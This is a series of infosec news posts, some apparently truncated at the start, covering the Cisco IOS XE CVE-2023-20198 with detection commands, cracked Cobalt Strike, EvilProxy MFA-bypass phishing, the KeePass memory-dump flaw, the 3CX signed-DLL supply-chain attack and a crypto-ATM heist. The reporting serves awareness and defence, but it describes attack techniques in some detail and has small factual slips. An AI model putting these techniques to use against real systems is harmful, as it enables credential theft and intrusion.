The vulnerability, CVE-2023-20198, affects all Cisco IOS XE devices that have the Web UI feature enabled, especially when exposed to the internet or untrusted networks. To ascertain if a system is vulnerable, administrators should:

1. Utilize the command show running-config | include ip http server|secure|active to check for the presence of ip http server or ip http secure-server commands in the global configuration.
2. Inspect the configuration for ip http active-session-modules none or ip http secure-active-session-modules none to determine if the vulnerability is exploitable over HTTP or HTTPS respectively.

Cisco’s Response
Cisco has acknowledged the vulnerability, confirming its presence in devices running the Cisco IOS XE software. The company provided steps to identify affected systems and noted the following Indicators of Compromise (IoCs):

1. System logs containing messages indicating programmatic configuration by unfamiliar users, such as:

• %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line.
• %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address].

1. System logs containing messages about unknown file installation actions, like:

• %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename.

1. Presence of an implant, checked by issuing the following command from a workstation with access to the affected system:

• curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1", if a hexadecimal string is returned, the implant is present.

Cisco, alongside other cybersecurity firms like Tenable, has provided plugins to identify affected systems. While awaiting a patch, these plugins and the aforementioned checks can assist in identifying and mitigating unauthorized access attempts.

CVE-2023-20198 poses a significant threat to cybersecurity due to its maximum severity rating and the absence of a patch. Organizations using affected Cisco IOS XE devices should remain vigilant and apply necessary mitigation measures to safeguard their systems from potential exploits.

The post Cisco’s Ticking Time Bomb: CVE-2023-20198 with CVSS Score 10 Hits Cisco Devices appeared first on Information Security Newspaper | Hacking News.

Cobalt Strike, a legitimate commercial penetration testing tool, has inadvertently become a favored instrument among cybercriminals for its efficacy in infiltrating network security. Initially released in 2012 by Fortra (formerly known as Help Systems), Cobalt Strike was designed to aid red teams in identifying vulnerabilities within organizational infrastructures. Despite stringent customer screening and licensing for lawful use only, malicious actors have successfully obtained and distributed cracked versions of the software, making it a prevalent tool in cyberattacks involving data theft and ransomware.

Cobalt Strike 4.9 is now available. This release sees an overhaul to Cobalt Strike’s post exploitation capabilities to support user defined reflective loaders (UDRLs), the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs, support for callbacks in a number of built-in functions, a new in-Beacon data store and more.  

Cobalt Strike 4.9 Features

The latest release, version 4.9, introduces several significant features and improvements:

• User-Defined Reflective Loaders (UDRLs): This feature enhances post-exploitation capabilities by allowing users to define and use their reflective loaders, providing more flexibility and control over the loading process of the Beacon payload.
• Export Beacon Without a Loader: Users can now export the Beacon payload without a reflective loader, which officially supports prepend-style UDRLs, allowing for more versatile deployment and execution of the Beacon payload in various environments.
• Callback Support: Version 4.9 introduces support for callbacks, enabling users to implement and handle custom callback routines effectively.
• Beacon User Data Structures Improvement: These structures have been improved to prevent crashes and provide more stability during operations. They also allow a Reflective Loader to resolve and pass system call information to Beacon, overriding Beacon’s default system call resolver.
• Host Profile Support for HTTP(S) Listeners: This feature addresses limitations in HTTP(S) processing by introducing a new Malleable C2 profile group named http-host-profiles.
• WinHTTP Support: The update adds support for the WinHTTP library to the Beacon’s HTTP(S) listener.
• Beacon Data Store: This feature allows users to store Buffer Overflow Frameworks (BOFs) and .NET assemblies in a structured manner.

Cracked Versions in the Wild

Google researchers have recently identified 34 different cracked versions of the Cobalt Strike hacking toolkit actively being used in the wild. These cracked versions are exploited by cybercriminals for various malicious activities, emphasizing the tool’s popularity and widespread illicit use in the cybercriminal community. The discovery of cracked version 4.9 of Cobalt Strike highlights the significant challenges and risks associated with the illicit use of this powerful toolkit.

The Crackdown

Microsoft, in collaboration with Fortra and the Health Information Sharing and Analysis Center (Health-ISAC), has initiated a widespread legal crackdown on servers hosting these cracked copies. This concerted effort aims to dismantle the malicious infrastructure and disrupt the operations of threat actors utilizing Cobalt Strike for nefarious purposes.

Why Cobalt Strike?

Cobalt Strike has gained notoriety among cybercriminals for its post-exploitation capabilities. Once the beacons are deployed, these provide persistent remote access to compromised devices, allowing for sensitive data harvesting or the dropping of additional malicious payloads.

The Users

Cobalt Strike’s cracked versions are used by unidentified criminal groups, state-backed threat actors, and hacking groups acting on behalf of foreign governments. These actors have been linked to numerous ransomware attacks impacting various industries, causing significant financial and operational damage.

Remediation Efforts

To counteract the malicious use of Cobalt Strike, various entities have provided resources to assist network defenders in identifying Cobalt Strike components within their networks. These resources include open-sourced YARA rules and a collection of indicators of compromise (IOCs).

The illicit use of Cobalt Strike poses a significant threat to global cybersecurity. The ongoing crackdown led by Microsoft, Fortra, and Health-ISAC represents a crucial step towards mitigating the risks associated with Cobalt Strike, underscoring the importance of collaborative efforts in the fight against cybercrime.

The post Unmasking Cracked Cobalt Strike 4.9: The Cybercriminal’s Tool of Choice appeared first on Information Security Newspaper | Hacking News.

According to a study on the events that was published on Wednesday by the cybersecurity company Proofpoint, the attacks demonstrated both the ubiquity of pre-packaged phishing-as-a-service toolkits as well as the increasing bypassing of multi-factor authentication in order to get access to accounts.

It was discovered that EvilProxy was sending 120,000 phishing emails to more than a hundred different companies in an attempt to obtain Microsoft 365 credentials. In the last five months, Proofpoint has seen a concerning increase in the number of successful compromises of cloud account credentials. The vast majority of the attacks were directed against high-ranking officials. According to the researchers’ estimates, the campaign targeted more than one hundred firms throughout the world, which had a total of one and a half million workers.

There were around 39% C-level executives among the victims, 17% of whom were Chief Financial Officers, and 9% of whom were Presidents and CEOs.

At least 35 percent of all users whose accounts were compromised in the previous year had MFA activated, which the researchers discovered to be a substantial rise in the number of account takeovers that occurred among renters who had MFA protection.

Threat actors operating at a very large scale relied heavily on brand impersonation, evasion strategies, and a multi-step infection chain (threat actors redirected traffic through open genuine redirectors).

Researchers from ReSecurity stumbled into the Phishing-as-a-Service (PhaaS) platform known as EvilProxy in September of 2022. The site was offered on the Dark Web. According to some reports, the alternate moniker is Moloch, which may have some link to a phishing-kit that was built by a number of well-known underground players who previously attacked financial institutions and the e-commerce industry.The bundle may be purchased anonymously on the dark web for a sum of four hundred dollars as of the autumn of last year.

As per experts EvilProxy actors circumvent two-factor authentication by using the Reverse Proxy and Cookie Injection techniques. This allows them to proxy the victim’s session. However, now that these approaches have been effectively productized in EvilProxy, it emphasizes the relevance of the development in attacks against online services and MFA authorization systems. In the past, similar tactics have been observed in the targeted campaigns of APT and cyberespionage organizations.

The post How $400 toolkit EvilProxy was used to send 120k phishing emails to hundreds of companies appeared first on Information Security Newspaper | Hacking News.

According to reports, a big data dump that was based on a whistleblower’s breach of internal Tesla papers suggests that problems with Tesla’s autonomous driving system may be considerably more frequent than authorities and the media have suggested. This was discovered after the whistleblower gained unauthorized access to internal Tesla documents.

According to information that was taken from Tesla’s information technology (IT) system, complaints against these Full Self Driving (FSD) capabilities originated from all over the globe, including the United States of America, Europe, and Asia.

Particularly, in an article titled “My autopilot almost killed me,” Handelsblatt reported receiving 100 terabytes of data and 23,000 files. Within those files were 3,000 entries highlighting consumers’ safety concerns and tales of more than 1,000 crashes.

The publisher included a note stating that the data includes the phone numbers of customers.

According to the hundreds of clients that Handelsblatt is claimed to have contacted, the fears were quite serious.

According to one man from Michigan, his Tesla “suddenly braked hard, as hard as you can imagine.” When I was ordered to fasten my seatbelt, the vehicle was on the verge of coming to a complete halt. I was then struck by a second car.

The files were shown to the Fraunhofer Institute for Secure Information Technology by Handelsblatt. The institute concluded that there is no reason to presume that “the data set does not come from IT systems belonging to or in the environment of Tesla.”

Employees are instructed that, unless lawyers are involved, they should not deliver written comments but rather should convey them “VERBALLY to the customer.” Unless attorneys are involved, written critiques should not be given.

The post quotes the instructions as saying, “Do not copy and paste the report below into an email, text message, or leave it in a voicemail to the customer,” and it is clear that this is a requirement.

An report featured a doctor from California who said that her Tesla accelerated on its own in the autumn of 2021 and smashed into two concrete pillars. She noted that the company never sent emails and that everything was always communicated verbally.

According to the attorneys for Tesla, the news organization is required to provide a copy of the data to Tesla, and all other copies of the data must be destroyed. The attorneys for Tesla also warned legal action “for the theft of confidential and personal data.”

According to reports, the alleged papers would undoubtedly be important to current wrongful death lawsuits made against Tesla. These claims assert that the company’s technology has significant safety faults. Additionally, they may compel local, state, and federal authorities to take action.

The state’s data protection officer, Dagmar Hartge, recognized the seriousness of the allegations and pointed out that, should the allegations prove to be accurate, the data breach would have significant repercussions on a worldwide scale. The situation has been sent to privacy advocates in the Netherlands so that additional investigation might be conducted.

“Tesla takes the protection of its proprietary and confidential information, as well as the privacy of its employees and customers, very seriously.” “We intend to initiate legal proceedings against this individual for his theft of Tesla’s confidential information and employees’ personal data,” Tesla stated in a response that was reported by the publication. The statement was made in reaction to the theft of sensitive information and personal data pertaining to Tesla employees.

The Chinese regulatory authorities have already started to take action. Approximately two weeks ago, Tesla was forced to provide an emergency software update for the majority of the automobiles it has sold in China as a direct result of problems with unexpected and sudden acceleration.

Since 2016, Musk has made many claims that his self-driving vehicles would be really autonomous, but he has not delivered on those claims.

The post Want to own a tesla or already own one, check this massive confidential data breach of Tesla appeared first on Information Security Newspaper | Hacking News.

This security flaw, which has been given the identifier CVE-2023-32784, makes it possible for the user’s master password to be dumped from memory even when the user’s workspace is closed or the program is no longer active. The master password is the main key that may be used to unlock the user’s database of passwords. A hostile actor could be able to extract the plain text master password from a memory dump. KeePass 2.x versions previous to 2.54 include this vulnerability. This vulnerability is widespread in KeePass 2.x versions. It’s possible that this is a dump of the KeePass process, but it might also be a swap file, a hibernation file, or even a RAM dump of the whole system. The fact that the initial character of the password cannot be reconstructed is the only minor solace in this situation.

A researcher by the name of vdohney built a proof-of-concept tool and gave it the suitable moniker “KeePass Master Password Dumper” in order to draw attention to this issue. This program provides a clear demonstration of how the master password might be retrieved from KeePass’s memory with the exception of the first character. This can be done without needing code to be executed on the machine that is being targeted, and it can be done even if the workspace is locked or if KeePass is no longer operating.

When entering passwords, KeePass 2.X makes use of a text box that was built specifically for it called SecureTextBoxEx. This text box is utilized not just for the insertion of the master password, but also in other locations in KeePass, such as password edit boxes (which means that the attack may also be used to retrieve the contents of other password edit boxes).

The vulnerability that is being exploited here is the fact that a leftover string is formed in memory for each character that is entered. Because of the way that.NET operates, once an instance of it has been created, it is very difficult to delete it. For instance, when the word “Password” is entered, it will leave behind the following strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The proof-of-concept program looks through the dump to find these patterns and suggests a possible character to use for each location in the password.

The reliability of this attack is susceptible to change based on the manner in which the password was written as well as the number of passwords that were input within a single session. However, it appears that the way.NET CLR creates these strings implies that they are likely to be well ordered in memory. This is true even if there are numerous passwords used for a single session or if there are errors in the passwords. Therefore, if three distinct passwords were entered, you have a good chance of getting three options for each character place in that sequence. This enables you to recover all three passwords if they were entered.

Should You Be Concerned About This?
It is dependent on the threat model you choose. This discovery does not significantly worsen your condition if your machine is already infected with malware that is operating in the background with the rights of your user. On the other hand, in contrast to KeeTheft and KeeFarce, there is no need for any kind of process injection or other code execution for the malware to be stealthy and dodge the antivirus software. This may make it simpler for the malware.

It might be a problem if you have a reasonable suspicion that someone could get access to your computer and undertake forensic examination. Even if KeePass is completely shut down or secured, it is still possible for the master password to be rediscovered. This is the worst-case situation.

If you have a clean machine and utilize full disk encryption with a strong password, you should be OK. Because to this discovery, it will be impossible for anybody to steal your credentials remotely over the internet.

The post Hack KeePass – Extract KeePass master password from Memory using this tool appeared first on Information Security Newspaper | Hacking News.

It is believed that the attack is a multi-part process, with the first stage using a hacked version of the 3CX desktop application. Although the.exe file and the MSI package have the same name, preliminary research indicates that the MSI package is the one that may include DLLs that have been maliciously modified.

The beginning of the infection process occurs when 3CXDesktopApp.exe loads the ffmpeg.dll file. After that, ffmpeg.dll will read the encrypted code from d3dcompiler_47.dll and then decode it. It seems that the decrypted code is the backdoor payload that attempts to visit the IconStorage GiHub page in order to access an ICO file that contains the encrypted C&C server that the backdoor connects to in order to acquire the probable ultimate payload.

It is not a coincidence that the threat actors responsible for this attack chose these two DLLs (ffmpeg and d3dcompiler_47) as targets for their attack. The application in issue, known as 3CXDesktopApp, was developed using the open-source framework Electron. Both of the libraries in issue are often distributed along with the Electron runtime. As a result, it is very unlikely that they would arouse suspicion inside the surroundings of individual customers. In addition, the file that was tampered with, d3dcompiler 47, is signed with a certificate that was granted to Microsoft Corporation, and the digital signature details for Windows reflect that there are no problems associated to the signature. A signed binary that makes use of a valid certificate procured from a trustworthy company such as Microsoft is more likely to be given the “green light” when it comes to endpoint protection programs.

In this instance, the “smoking gun” was a combination of RC4 encrypted shellcode that was inserted into the signature appendix of d3dcompiler and a reference to the d3dcompiler library that was introduced to the ffmpeg library. Both of these things were added to the ffmpeg library.

Windows will show a notification saying the “digital signature of the item did not validate” whenever a signed executable is updated, but despite the fact that we are aware that the d3dcompiler_47.dll DLL was altered, Windows continued to present it as signed. This is despite the fact that we are aware of the fact that it was modified.

It seems the DLL is abusing the CVE-2013-3900 flaw, which is referred to as a “WinVerifyTrust Signature Validation Vulnerability.”

On December 10, 2013, Microsoft was the first company to publicly disclose this vulnerability. At the time, the company explained that it is possible to add content to the authenticode signature section of an EXE (the WIN CERTIFICATE structure) in a signed executable without rendering the signature invalid.

Microsoft made the final decision to make the fix optional, most likely because it would invalidate genuine, signed executables that contained data in the signature block of an executable. As a result, Microsoft made the decision to make the update optional.

According to the disclosure made by Microsoft for the CVE-2013-3900, the company changed the way signatures are verified for binaries signed with the Windows Authenticode signature format with the release of an update on December 10, 2013. This update was made available for all supported releases of Microsoft Windows.

This modification may be activated on a voluntary basis if desired.When the new behavior for Windows Authenticode signature verification is enabled, Windows will no longer regard non-compliant binaries as signed, and it will no longer allow unnecessary information to be stored in the WIN CERTIFICATE structure.

Even though it has been close to 10 years after the vulnerability was discovered, and even though it is known that several threat actors are exploiting it, the remedy is still an opt-in feature that can only be activated by manually modifying the Windows Registry. To make things worse, even if you add the Registry entries to apply the update, they will be deleted after you upgrade to Windows 11, putting your device susceptible once again.

Companies that are possibly impacted should immediately cease using the vulnerable version of the software, dlls if at all feasible and implement any patches or mitigating measures, if these are available. IT and security personnel should also search for proven compromised binaries and builds and watch for abnormal activity in 3CX processes, with a particular attention on C&C traffic.

In the meanwhile, activating behavioral monitoring in security solutions may assist in determining whether or not an attack is currently taking place inside the system.

The post d3dcompiler_47.dll: If AV raises an alerts about this Microsoft signed dll file, you are in trouble appeared first on Information Security Newspaper | Hacking News.

According to the firm, “the attacker searched the Digital Ocean cloud hosting IP address space and discovered operating CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean.”

The attackers gained access to the database as well as API keys for accessing money in hot wallets and exchanges as a result of the code execution. The attacker leveraged the master service interface to remotely upload a Java program, gaining access to BATM user rights, the database, and API keys required to access money in hot wallets and exchanges.

As a consequence, the hacker gained access to users, password hashes, turned off two-factor verification, and sent funds from hot wallets.

The hacker was successful in stealing 56.28 bitcoin, worth around $1.5 million, as well as liquidating other cryptocurrencies including as ETH, USDT, BUSD, ADA, DAI, DOGE, SHIB, and TRX. The stolen assets have not been moved from the bitcoin address since March 18, and certain digital currencies have been transferred to other destinations, including a decentralized trading platform.

Additionally, the attackers got the “ability to access terminal event logs and search for each occurrence when users scanned private key at the ATM,” information that previous versions of ATM software recorded.

“On March 18, we advise all of our clients to take quick steps to safeguard their finances and personal information,” General Bytes tweeted.

The wallet addresses and three IP addresses used by the attacker in the breach have been revealed by the firm. Yet, according to certain sources, the company’s complete node is safe enough to prevent unwanted access to cash.

The business released information on the actions clients should take to safeguard their GB ATM servers (CAS) in a security advisory documenting the event, emphasizing that even those who were not affected by the incident should adopt the suggested security measures.

“Please keep your CAS protected by a firewall and a VPN.” Terminals should also use VPN to connect to CAS. With a VPN/Firewall, attackers from the open internet are unable to access and exploit your server. If your server was compromised, please reinstall the whole server, including the operating system,” the business advises.

The crypto ATM manufacturer issued a CAS security patch and advised consumers to consider all user passwords and API keys to exchanges and hot wallets as compromised and to replace them. 
“We don’t have the final statistics yet,” General Bytes said. We’re currently gathering information from operators. We are still dealing with damage of roughly 56 BTC as of today.

The post How Cryptocurrency ATM manufacturer was hacked and millions of funds were stolen? appeared first on Information Security Newspaper | Hacking News.